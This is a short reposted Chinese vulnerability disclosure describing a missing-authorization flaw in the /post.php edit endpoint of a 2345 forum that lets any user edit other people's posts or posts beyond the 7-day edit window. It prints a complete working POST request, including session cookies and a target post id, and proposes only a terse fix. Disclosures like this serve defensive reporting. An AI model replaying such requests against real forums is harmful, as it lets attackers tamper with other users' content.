2345论坛过滤不严可任意编辑他人帖子 - 网站安全

接口缺少过滤可以任意编辑他人帖子/任意编辑超过7天限制的帖子

问题接口:/post.php

POST /post.php HTTP/1.1 Host: wangpai.2345.cn Proxy-Connection: keep-alive Content-Length: 193 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Origin: chrome-extension://kajfghlhfkcocafkcjlajldicbikpgnp Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: user_info=NjQ0ZXpGdEJwMk5rRTNVMi9PTnNWZXpzTUoxbXlxaHBnNk9FK2dKY21VYmlhajdvY1Ara01xU2h3RFlxU09Z; I=i%3D332053%26u%3D958194%26n%3D654188164%26t%3D1407067341.76247900%26s%3Db4bf332239352cff252f64303859bb0a%26v%3D1.0; PHPSESSID=nt2315hhj7a41583m0e8md0ui1 title=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&isBright=1&content=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&id=2491986&postid=2491986&act=edit_post&fid=13&page=&key=d274ec87aacec1c8728692cf578c5c29

以上代码可以编辑如下帖子 http://wangpai.2345.cn/thread.php?fid=13&pid=2491986

如果用这个漏洞编辑置顶帖子的话,危害挺大的吧

修复方案：

过滤吧- -

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did15237

更新时间：2022-09-13 阅读：62次